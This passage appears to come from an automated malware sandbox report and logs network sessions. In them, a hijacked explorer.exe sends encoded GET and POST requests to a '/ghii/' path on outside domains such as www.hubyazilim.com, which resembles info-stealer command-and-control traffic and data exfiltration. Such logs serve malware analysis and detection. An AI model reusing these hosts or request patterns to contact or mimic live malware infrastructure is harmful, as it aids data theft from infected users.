d4 81 73 4a 25 e8 43 65 d8 4a 10 b4 f5 1c 94 5f 22 ba 9b 06 f5 b3 30 65 88 5d a6 64 a0 e0 34 8d 42 1f b3 30 89 5b 51 f0 f6 0b 9a c4 0a f2 23 4c e9 40 e1 ca d4 a8 3f 25 33 ac 4d 32 9c 4e 95 e1 95 f2 2b ce e6 82 29 3d 25 d7 ba 00 d1 93 6c a2 a8 ca af 04 64 ef e9 95 f2 2b e0 a1 f4 94 af c8 e8 71 c8 08 64 86 41 09 2f c2 c1 e5 28 8c a2 34 c2 31 11 d5 76 6f 41 46 54 c0 ce b3 68 37 ac a2 2a bc e0 bd ad 05 56 95 80 88 e2 86 49 0c 70 7f f9 1f e8 af 7f f8 fd 4f ff e5 fb bf fe e1 87 5c d5 2f ff f8 b7 39 e6 4f ff f8 87 97 ff fc a7 97 ff ed 2f e8 a7 3f fe bf 9f fe fe f7 3f fd cd 7f 46 3f fd c3 df bc fc 8f df a3 97 7f fe fe e5 3f fd f0 e3 bf fc 59 51 95 34 01 3d 87 38 7a d7 17 84 4b 65 7d 4c 70 e6 4f 65 86 aa 30 9c 4d 08 53 7a 2b 80 87 31 cb 2e 3f 4f c2 98 89 32 3e 21 b3 34 c2 8c ec 2e eb 3b 74 70 45 39 e9 e7 8c 64 b3 e7 94 65 61 3c 59 2a 4b 55 f9 66 4e b2 4b 2d 8c d3 39 d4 49 46 be 99 87 19 09 44 83 dc 44 51 96 cf 54 25 8c 1f e1 78 32 c7 13 e0 2a 1c c3 f2 d9 f2 b4 25 74 95 b7
                                                                                            Data Ascii: 238f}F+BJiLVn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,x2P/H#89?%l|1IFOlp'a(J'5<*!(!YIEYrD/*8#209LCh)JRoI!"6%7=~J$e&ZKdZ$Yf-J4BxBP04Nq4?oOufIJ2v9PI/J%?BsJ%CeJ_"0e]d4B0[Q#L@?%3M2N+)=%ld+qdA/(41voAFTh7*VIpO\/9O/??F??YQ4=8zKe}LpOe0MSz+1.?O2>!4.;tpE9dea<Y*KUfNK-9IFDDQT%x2*%t
                                                                                            Feb 18, 2023 13:07:19.579811096 CET182INData Raw: c6 d6 46 7b d3 79 fb 39 3a 3a 8d c2 f8 0c 65 24 1a 9c 04 31 d5 d2 8c 8c 09 f3 a7 27 68 9a 91 f1 e0 a4 ae 04 c2 55 ec c3 5b 2c 16 fa 24 49 26 11 61 78 32 c3 31 9e 90 ec 70 ec d0 d0 17 69 0d b8 82 23 46 b2 18 94 5c 63 f6 19 a5 6f 5f cc 22 05 f1 b6
                                                                                            Data Ascii: F{y9::e$1'hU[,$I&ax21pi#F\co_"f_A\wNQ^;\"?HhYa$"%E0JaJ,5[_u+_$#_8-.T==pj|P`2|Ob3&s
                                                                                            Feb 18, 2023 13:07:19.579859018 CET183INData Raw: 56 49 3d 99 d4 2f 95 7d 47 d1 b9 20 44 f4 ed d7 2f f6 0b da 2a 13 a8 bc 80 d5 91 4c 8b c8 04 fb 97 15 1d 38 ba a5 9b ed 4d 25 ec ac a0 57 2b e8 1a c1 43 aa 68 bb 74 7c ac 1f fa 1a 9b 92 19 d1 44 ee cd 4c a8 42 89 56 a4 da 69 34 93 28 19 c1 5c 90
                                                                                            Data Ascii: VI=/}G D/*L8M%W+Cht|DLBVi4(\`]Q\^i"`G4?LFz0%Q4/.{:]1IqD4p<<-#AH=\4q2!sb?Od\+=t=KaF\ }
                                                                                            Feb 18, 2023 13:07:19.579942942 CET185INData Raw: 6d 98 1c ec 1f 6e c3 64 bf d7 b8 0d f5 c3 7c c9 6d 38 5c df c3 dc 86 db ad fc ce 2b 64 7c b0 37 ba 15 cf 1b f8 a8 db 57 e5 75 3c d7 ad 4d f3 3a fe ec f6 45 3b d8 cb dd 9e d5 3e df c7 d7 7f 73 e2 a5 97 57 e2 f3 6e 40 fc 70 5f 77 03 e2 07 f8 b8 1b
                                                                                            Data Ascii: mnd|m8\+d|7Wu<M:E;>sWn@p_wP=|>&nn\UY75kpuc[}eL^l=x;YYH08=n[st*/Jj~u}hX/&<W/'aP
                                                                                            Feb 18, 2023 13:07:19.579993963 CET186INData Raw: 0c d6 6b 32 78 71 6f 5a 29 db ca bc 5d b4 03 a3 2c f5 40 38 39 e4 d8 de b5 af c3 cb b1 ca fe 9a 15 81 00 d7 b7 e0 71 50 dd 50 b4 05 73 8b 36 ae dd 4c b9 5f 20 29 e6 21 7f 31 40 a2 48 0f 63 08 47 34 0c 91 28 6f 87 b5 50 f9 dd 1e 1a ce 08 de 06 94
                                                                                            Data Ascii: k2xqoZ)],@89qPPs6L_ )!1@HcG4(oPIT"(J`vVvS&4Hu_qPC8Z6a~3Df8BjJ)Vea1Dyn5On=qFebEm595dyEYR
                                                                                            Feb 18, 2023 13:07:19.580044985 CET188INData Raw: 76 fb f7 19 95 90 75 8e bc 76 99 bb 1c dc 25 59 e9 6a f1 af 92 2c f8 1c 9c 0f 12 f7 e1 1e 82 53 54 cb e8 32 af 44 53 ef 3a ba c1 55 5b 42 8e f1 39 c9 44 20 72 4e b2 70 2c 4b 59 22 e5 b6 0d af 63 db 81 d7 1d 8f 1d b7 dd 09 46 06 0e 3a a3 31 71 5c
                                                                                            Data Ascii: vuv%Yj,ST2DS:U[B9D rNp,KY"cF:1q\|rq;i;o?z>{2.~~-w?Wi}o>t;oR~?M-RV;U?<&1%wSzP@mXBXt>,q\Z)Dv2H7ak/
                                                                                            Feb 18, 2023 13:07:19.580092907 CET189INData Raw: c7 ef ea 76 db d6 e0 b7 85 2c 47 77 bd ae 7c b1 6d bd eb 58 c8 78 64 b9 1e b2 2c 4b 37 dc 6e 64 ba 1c 4b e3 7f ed fd c8 48 bc 72 38 54 86 43 86 84 79 64 75 ba 3a f4 c1 96 eb 09 f2 36 92 5c fc bd c8 5a 29 4f 93 79 e2 a5 2a bd 60 11 69 92 30 92 e2
                                                                                            Data Ascii: v,Gw|mXxd,K7ndKHr8TCydu:6\Z)Oy*`i0GJ-_:E.BZ@)x..AzE#9&xwL9tIpuG14 :FnzRVx5/8]3>9IrPQ-^x
                                                                                            Feb 18, 2023 13:07:19.580133915 CET190INData Raw: 20 64 9b 9c 6c 47 3e f3 42 52 20 61 71 72 1e 5a a5 bb 8f 4c b7 a3 1b 1e 32 db 9e ee 18 1d bf 20 84 b8 64 9c 84 8d 56 65 b3 91 94 8c eb d1 41 42 a7 2b dd d8 8f 6c c3 86 d0 df 36 3a ba e3 03 21 f8 2f d4 0d 24 bb 68 a5 7a f7 db 8a 41 c4 49 fc 2d c9
                                                                                            Data Ascii: dlG>BR aqrZL2 dVeAB+l6:!/$hzAI-/~/@6Kex7?h^)s837s]>$(H|~}CQHlq`yu3D9D_h(dNQD)JsTH22Kg7^,g<m
                                                                                            Feb 18, 2023 13:07:19.580172062 CET190INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            12192.168.2.34971266.235.200.14680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:21.585549116 CET190OUTGET /ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&9WI6t=QaRcz HTTP/1.1
                                                                                            Host: www.ladybillplanet.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:07:22.091809034 CET191INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Sat, 18 Feb 2023 12:07:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-UA-Compatible: IE=edge
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&9WI6t=QaRcz
                                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            CF-Cache-Status: MISS
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 79b6a457e8bc9bf4-FRA
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            13192.168.2.34971391.195.240.11780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:27.248894930 CET192OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.hubyazilim.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.hubyazilim.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.hubyazilim.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 37 49 65 74 45 48 59 31 74 42 75 30 7a 66 34 4c 51 48 66 36 49 42 6f 6a 61 62 41 74 33 63 34 4c 43 5a 4b 64 61 32 34 43 76 62 70 56 64 58 7a 78 4a 37 53 31 4b 68 39 79 64 69 6c 42 49 52 38 75 73 72 59 66 34 37 4f 30 28 34 31 7a 6b 4c 55 4c 59 53 35 69 4c 4b 67 5a 49 43 55 78 44 79 35 38 32 7a 70 45 37 7a 31 67 6f 6d 28 4d 6c 35 69 32 51 45 55 70 78 61 4d 54 4f 32 47 4c 45 35 61 77 44 32 7e 69 41 56 66 43 7a 49 44 4d 66 4b 4a 45 28 44 77 61 67 57 31 64 46 43 70 67 56 6b 55 30 6e 4f 45 35 4b 6a 63 41 77 49 42 77 72 6f 45 42 52 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=7IetEHY1tBu0zf4LQHf6IBojabAt3c4LCZKda24CvbpVdXzxJ7S1Kh9ydilBIR8usrYf47O0(41zkLULYS5iLKgZICUxDy582zpE7z1gom(Ml5i2QEUpxaMTO2GLE5awD2~iAVfCzIDMfKJE(DwagW1dFCpgVkU0nOE5KjcAwIBwroEBRg).
                                                                                            Feb 18, 2023 13:07:27.268385887 CET193INHTTP/1.1 403 Forbidden
                                                                                            date: Sat, 18 Feb 2023 12:07:27 GMT
                                                                                            content-type: text/html
                                                                                            transfer-encoding: chunked
                                                                                            vary: Accept-Encoding
                                                                                            server: NginX
                                                                                            content-encoding: gzip
                                                                                            connection: close
                                                                                            Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            14192.168.2.34971491.195.240.11780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:30.077301979 CET199OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.hubyazilim.com
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.hubyazilim.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.hubyazilim.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 37 49 65 74 45 48 59 31 74 42 75 30 7a 5f 6f 4c 57 6b 6e 36 4f 68 6f 69 47 72 41 74 39 38 34 50 43 5a 32 64 61 33 39 50 76 75 35 56 64 46 4c 78 49 66 79 31 52 68 39 79 62 69 6c 46 4d 52 38 34 73 72 4d 35 34 35 57 6b 28 37 5a 7a 6b 5a 63 4c 65 79 35 6c 4a 71 67 59 50 43 55 79 41 43 35 38 32 79 56 32 37 32 4a 77 6f 6c 28 4d 6c 50 65 32 51 47 4d 6d 6a 36 4d 53 43 57 47 4c 45 35 58 77 44 32 7e 59 41 52 4c 53 7a 4c 37 4d 64 63 74 45 36 53 77 5a 32 57 31 6b 4e 69 6f 51 59 46 39 52 69 38 4a 4b 43 6a 6f 68 33 75 6b 45 6c 5a 35 31 4f 77 49 37 4f 41 6c 41 56 72 56 32 39 4f 45 38 74 2d 55 38 62 61 6e 48 75 41 6e 2d 30 79 77 35 69 62 57 51 77 6e 58 6c 75 33 53 51 68 6f 79 38 4c 4a 42 74 63 50 36 6c 59 49 75 67 6c 39 4a 72 4b 54 49 55 79 51 43 36 4e 30 68 72 6c 65 4e 4e 4f 56 49 45 72 53 52 6a 41 57 39 6e 62 31 70 63 59 4f 67 78 72 2d 4a 31 69 6d 75 6c 61 36 71 66 37 36 6f 48 75 30 7a 53 39 4d 28 64 69 59 5a 31 75 4f 55 39 69 6d 77 59 38 59 4f 4f 66 50 77 50 35 51 75 5a 30 50 6c 72 45 36 39 54 7e 4e 74 58 65 32 61 50 48 78 78 4b 74 55 6c 41 31 6c 71 35 6d 38 4e 37 4d 4a 78 34 6d 5a 53 31 71 72 47 34 44 4d 28 69 55 52 41 6b 53 55 34 6b 70 50 58 49 4f 31 78 4f 73 45 37 5a 74 4e 52 68 44 68 6c 74 64 57 46 32 75 4a 33 48 69 59 55 32 63 52 67 73 78 49 4a 49 48 62 6a 74 28 34 44 69 6d 51 4e 5f 62 44 67 55 45 30 38 59 72 38 68 4c 4f 31 67 41 6e 48 38 5a 41 6d 31 32 4f 4a 67 71 62 57 4f 67 59 4c 74 6f 59 75 53 62 4e 6c 67 61 42 30 56 50 5a 34 70 61 54 6d 45 41 53 4c 73 30 35 46 62 51 73 6b 6f 77 79 54 53 41 54 30 61 75 47 77 54 6c 72 44 79 42 45 42 46 4f 35 47 7e 4b 44 39 59 4f 7e 7a 62 6d 67 69 66 30 64 30 42 71 33 43 38 4e 28 62 46 74 42 45 55 56 63 79 31 55 47 45 49 79 50 77 33 4c 6f 38 51 79 75 35 76 76 76 42 59 77 52 64 4c 48 44 76 69 4e 74 6a 70 37 32 4a 43 5f 5a 34 57 59 57 51 7a 5a 64 6a 30 56 67 41 28 35 6f 38 5a 37 7e 50 6e 57 68 4c 53 6a 6a 48 36 46 44 36 32 44 76 64 39 66 37 4e 47 38 68 53 75 61 74 49 58 41 68 58 45 6a 37 4d 48 33 72 69 44 37 49 67 79 4a 65 39 6b 31 30 32 36 38 41 51 51 77 77 36 38 67 55 30 67 71 69 4c 65 30 74 6a 53 41 37 67 4b 34 54 5f 6e 31 4a 6f 36 4c 65 70 35 46 52 51 35 59 59 78 49 4f 61 4d 47 46 66 6e 42 57 55 53 48 41 74 37 36 4f 59 44 55 44 61 64 4a 6a 47 42 4c 74 56 64 6e 38 74 51 6b 6f 46 47 64 37 55 71 50 6d 47 5f 72 58 55 52 75 43 54 42 6d 45 42 4a 49 64 6b 5a 6a 58 49 76 42 62 42 6c 4c 73 49 4a 31 4d 67 6b 45 71 30 31 36 4b 68 52 71 68 63 35 4a 4b 77 56 33 6d 6d 37 30 48 72 6c 28 4f 68 6d 73 73 28 68 6e 71 44 62 61 5f 32 32 4d 46 69 77 77 4f 73 6f 64 48 31 6f 70 49 45 4a 28 4b 69 76 4d 65 38 4a 7e 6e 74 4a 28 66 71 6e 6f 37 4d 39 72 76 37 6e 72 42 76 73 73 74 32 39 57 69 32 66 42 2d 59 56 73 53 68 43 4f 44 6d 37 56 61 39 77 4a 57 32 4b 31 39 42 5a 58 62 46 6a 4c 55 72 32 43 48 4f 5f 42 69 62 37 61 57 63 53 7a 78 36 78 61 77 71 71 66 6c 67 6f 44 76 6b 75 78 34 35 6c 44 52 51 6e 76 6a 55 6a 73 62 4d 34 5a 58 5a 69 7e 4a 4e 52 53 70 43 45 6a 47 48 49 55 75 7a 54 6d 6a 43 71 65 77 28 6e 5a 5f 6c 51 44 78 4f 35 37 70 73 4f 58 77 63 53 70 49 78 30 67 66 43 6d 5a 64 58 47 7e 58 52 34 33 50 58 48 32 30 64 6d 6f 54 59 37 53 78 6e 47 4d 31 62 57 6d 5f 49 37 31 5a 6b 33 68 41 58 50 6c 41 73 31 52 6c 6c 62 73 64 59 34 69 32 50 46 72 36 57 43 30 5f 45 6f 33 59 71 44 57 37 47 61 68 41 38 59 7e 6d 44 7a 31 42 35 77 44 56 68 6a 76 61 32 71 69 4f 74 35 61 62 33 41 6b 6c 58 64 6f 37 71 7a 7e 4f 64 67 76 4a 33 56 49 51 43 4a 45 30 48 56 34 61 4e 63 32 2d 4a 64 64 33 6b 35 4c 62 72 45 65 74 55 5f 35 42 51 4e 4a 6e 65 50 61 6b 39 66 37 72 7e 78 79 45 4e 32 63 71 6e 62 36 44 31 69 67 72 37 45 50 54 79 4e 7e 79 48 37 36 4f 28 52 69 35 6a 5a 49 4f 6e 53 4d 49 6a 6f 33 4f 6d 39 6a 6c 58 64 7e 30 67 32 4b 67 35 66 5a 39 44 4f 75 36 66 59 39 53 51 72 76 36 28 6b 50 76 79 68 46 63 34 4b 71 33 39 52 4e 38 28 41 30 39 62 34 7e 50 65 45 63 4c 4d 46 6f 41 63 65 6c 5f 45 71 37 47 4f 6b 6a 7a 49 32 4f 77 7a 64 45 32 6b 4d 75 62 58 67 45 54 78 42 69 67 69 72 38 73 6d 34 65 38 49 51 79 6a 6c 64 36 32 57 49 52 75 5a 6b 71 53 76 59 51 58 6d 61 6b 6f 50 54 33 49 67 57 6b 4b 48 67 69 48 46 65 7a 50 78 39 47 74 38 39 35 58
                                                                                            Data Ascii: Y5=7IetEHY1tBu0z_oLWkn6OhoiGrAt984PCZ2da39Pvu5VdFLxIfy1Rh9ybilFMR84srM545Wk(7ZzkZcLey5lJqgYPCUyAC582yV272Jwol(MlPe2QGMmj6MSCWGLE5XwD2~YARLSzL7MdctE6SwZ2W1kNioQYF9Ri8JKCjoh3ukElZ51OwI7OAlAVrV29OE8t-U8banHuAn-0yw5ibWQwnXlu3SQhoy8LJBtcP6lYIugl9JrKTIUyQC6N0hrleNNOVIErSRjAW9nb1pcYOgxr-J1imula6qf76oHu0zS9M(diYZ1uOU9imwY8YOOfPwP5QuZ0PlrE69T~NtXe2aPHxxKtUlA1lq5m8N7MJx4mZS1qrG4DM(iURAkSU4kpPXIO1xOsE7ZtNRhDhltdWF2uJ3HiYU2cRgsxIJIHbjt(4DimQN_bDgUE08Yr8hLO1gAnH8ZAm12OJgqbWOgYLtoYuSbNlgaB0VPZ4paTmEASLs05FbQskowyTSAT0auGwTlrDyBEBFO5G~KD9YO~zbmgif0d0Bq3C8N(bFtBEUVcy1UGEIyPw3Lo8Qyu5vvvBYwRdLHDviNtjp72JC_Z4WYWQzZdj0VgA(5o8Z7~PnWhLSjjH6FD62Dvd9f7NG8hSuatIXAhXEj7MH3riD7IgyJe9k10268AQQww68gU0gqiLe0tjSA7gK4T_n1Jo6Lep5FRQ5YYxIOaMGFfnBWUSHAt76OYDUDadJjGBLtVdn8tQkoFGd7UqPmG_rXURuCTBmEBJIdkZjXIvBbBlLsIJ1MgkEq016KhRqhc5JKwV3mm70Hrl(Ohmss(hnqDba_22MFiwwOsodH1opIEJ(KivMe8J~ntJ(fqno7M9rv7nrBvsst29Wi2fB-YVsShCODm7Va9wJW2K19BZXbFjLUr2CHO_Bib7aWcSzx6xawqqflgoDvkux45lDRQnvjUjsbM4ZXZi~JNRSpCEjGHIUuzTmjCqew(nZ_lQDxO57psOXwcSpIx0gfCmZdXG~XR43PXH20dmoTY7SxnGM1bWm_I71Zk3hAXPlAs1RllbsdY4i2PFr6WC0_Eo3YqDW7GahA8Y~mDz1B5wDVhjva2qiOt5ab3AklXdo7qz~OdgvJ3VIQCJE0HV4aNc2-Jdd3k5LbrEetU_5BQNJnePak9f7r~xyEN2cqnb6D1igr7EPTyN~yH76O(Ri5jZIOnSMIjo3Om9jlXd~0g2Kg5fZ9DOu6fY9SQrv6(kPvyhFc4Kq39RN8(A09b4~PeEcLMFoAcel_Eq7GOkjzI2OwzdE2kMubXgETxBigir8sm4e8IQyjld62WIRuZkqSvYQXmakoPT3IgWkKHgiHFezPx9Gt895X(kuRyX5vZ_ox(8byvKi4Swwz(84XjMdBnYi4YcG3Oo6JV1plJbaojODov-(SAnQ5~TQjJPzvHFlPCYgDlSRl7RSkFNxyvSknfrwR~x39Vl5nEIphxgLVUfY2QeaxE-acJCON~ZqxjprZQghx0BE24hyxpNwMEWroSuNuhHTdLWKkQTVRo6N0B8L078XxAb8tkAjlgrOe6nb71TPyLzWZcd0dHsg77096yvSlRMgh6nRPV0aZxoQtmOl3uuUDEClKVaMWNOMB6AxEbWkODc2Cncpi1GsnLPz8W6xc5Mj-2Rx8E_isLRUMxRy6OzWzYhqoqA~VsO1oqw7W1sgLhObsGasxhi2zfeOLE6RTog~7(dr4sAp-Y8uXTs4jj-zFwd2lvK(86S0SeEjtn4zyLyYaYQXZ~mOgx11HuYQxxadCgKr6KQeqM3Ktc9oFb_zBKM470-kVLYQOuZbP5QitmOkR~H2mks0E6YBPDTc6YXAw8I4TvgYwWvnFxGQlngRJq_ih(oKkRkxqSXu-gkJdxSKsUppc2LVxigSyigqee3(3uwab9ZqvmsocXkWBJ8Fjq-nuBUMDa2kOp9um6m89NpjcoqThhz4l0RfGXeGa(-eqnJP1SCh8bKyx4JQpB_qj~IKO7VAvkG(DqAyE5DsUaUgqmq081vOp8oD5w2xir-RAy4LotlgeBQ(DpwpuAE8E3W0_OfChuQw6n1Q1gTKFScrEtBRMWFUFHQlJTFEgGiChmUOgs9oje6SMDNaNhLWFxQ6o~FPM2CCypgpe0tUXDNd-HN3DxokFtSLhSL6-IDd4DsuRlLz4kaKpkoC3bYILUeek~oy7BXpRS8tHQdD3M57SReWEuTqPNBDnUe00fmt5NRNTh4DoGPV8wwz4xfrvXM7pCvQaToTbYX59kH74UV8JKTEof1Rr1ku31kzDtely34i5wu80hmZ8mNO66xQoFc80JPCNRoMZajxVD53eGmcFw873bIsnpoSDpNX4j96LDINomoVs5S(5394iVSLBTAhX~qglnSXyVVs9e9i8jJnBi8QuOW~KFoqs4AdWvdRoReDbXATbiakkdmEZ36JRTqA6W_vH1Uv5LEKRW1yKl7NMskQKjbnBW7BsR6vMvE1Ji4u9dNcJAzKZ3lBY8Ybso23vB1SeuBC_QPjemA(ZbC7K5SoevsBGZDaufDaGSOEqYoK-hG2gPmE9KO4f9GgJZt9itDG7O7kSJuVQnAbpe4byGYZzmd3gv9pENdeiO8kx1TB1uJ1pIPPXzDwSMC6lY56OPz5UudxbqKwQHg(Z58xHsX(MEiwjRUoLezIyZS9M25q4SB15Y3qbmyoAzOBJasi30nMS5eyBdkI8ySpwKqJqrnnIbst-o4O5AsF83-oPwMtYYdebGcNTTaRORPo_(ej8XN8qAc9mXTtIMkchTMVxS-e-rbR_ARHHD2eRI-J4mhiYbSSG(tHlWrnn0DCnYTok0yjKFmVRppRGZiUJpZ9NxIjh3QZlAbZHqnrBp3821lGBtFFFFIY3STbEahaoYUKPKTYrwGEP86(1oVida8(CcWPwoRJYZ650OiE5XSH4bxIoCtSTSajGNhf-aO3vXyBuXK3GnS7BViZ5PMq4ZRkZMxsVga8O6ffTkIs-cpPz~5YhYY88wF5pEFmi5KzWH84ghZRAI8IOhtFlgEZRG3JHsr4XOLvaLctecJx3eHh6uB7O076q02hYgZxS39~C24qqo7Q4~MCUJI2RHnN9q25syJl_JQ08ceKJ0SshI3G7Ntaam66iGhSLqDukM_DqjvFfH_k0tqkwUEMNFRc811km3jZCGXx00i~XSYFFh2trdORqnl~YIxz4S758P1u2CuoeTUaAczlI(wF5aldABHRJbGBI(6p4935naDNJp22dY9PHxdT-ouIBFSLzGJUq8K7Lb6Dp67EgL7Xjlyd-Sn1xsf0V8b2Oz_rrysEhEiM4Jx3-0uqiPb~ULc81iZ~DmoOxZL~0WsBTM2tJYPSmfgXtcA9bX1Su1GoyQP0D9Of-UToS8ABEgDtRLv0wIu6z4BYJb1myFzWt4gm0vpOeP6GZG7VkPGFfy7tlOGOI~umTAmpLmI9yvE3z4vfRMnu9t7JKKRAOXJh6diRI0RYuuprU4AqxNWaRnaEfbGquD7icagappq4nTZtDIYGahYHkeEr-uuJaEXGsNL(qsYSQI8Zw1S3cYj9hHwAJLvZilbkSkeDX7R8VgkY_bE7nUjbw77FO595sZF8brs5kNutN4k9XldIw9L9psxeu2gXTPRdSBxlX1HCqMeEvbizpkLEFaGMJ7Mk52z30JR9o34OLQaiE522LyEpk89HuYasW5EhhTlmPzRUsf0xKN5aXdcNKE21c956EcqXeG_PQ2ablqmj0c6wdGQjGksRzeoiYLUbaatjb0L0W0Nk0qImHKLsLwdcbg9Dzfb1AgfUbVrt-SlYiAcxCcqiSqlQQoAWViqcRaH6DBPrKamE5FFLZymNqLD8h4du2tkJ88Qbrr7vGIDImu1rfbJfzJjGXAvwURjLt3ZCxy7pmKhXcYvj-7qTwfeBtz-Y2QLkw3AY9E7Nbl59lA3KQeIZQsXImuyy0O8IxIp6qSHuhB9iq(hBEUee9syyC2ZtoU2UWRkIfIpNsVYe2LuNiTuMiD0FS1y5qoDz9njpOH1rmUQCZPznXkHU5jTbjy2CJ8Uo2rMVOInLhjMCCpYZ6WflJXu~gxJe
                                                                                            Feb 18, 2023 13:07:30.097371101 CET199INHTTP/1.1 403 Forbidden
                                                                                            date: Sat, 18 Feb 2023 12:07:30 GMT
                                                                                            content-type: text/html
                                                                                            transfer-encoding: chunked
                                                                                            vary: Accept-Encoding
                                                                                            server: NginX
                                                                                            content-encoding: gzip
                                                                                            connection: close
                                                                                            Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            15192.168.2.34971591.195.240.11780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:32.618267059 CET200OUTGET /ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g== HTTP/1.1
                                                                                            Host: www.hubyazilim.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:07:32.670150042 CET201INHTTP/1.1 200 OK
                                                                                            date: Sat, 18 Feb 2023 12:07:32 GMT
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            transfer-encoding: chunked
                                                                                            vary: Accept-Encoding
                                                                                            x-powered-by: PHP/8.1.9
                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                            pragma: no-cache
                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_mPVN2/L6MAFbRbhZXXuOntSz/aY4/PDFYiF6YFNK+wNo2QAxKnO1L/CYxuU/mC/+Xiz+Mr9OzUE7Xz6J/T3uAA==
                                                                                            last-modified: Sat, 18 Feb 2023 12:07:32 GMT
                                                                                            x-cache-miss-from: parking-5544546577-9pvcg
                                                                                            server: NginX
                                                                                            connection: close
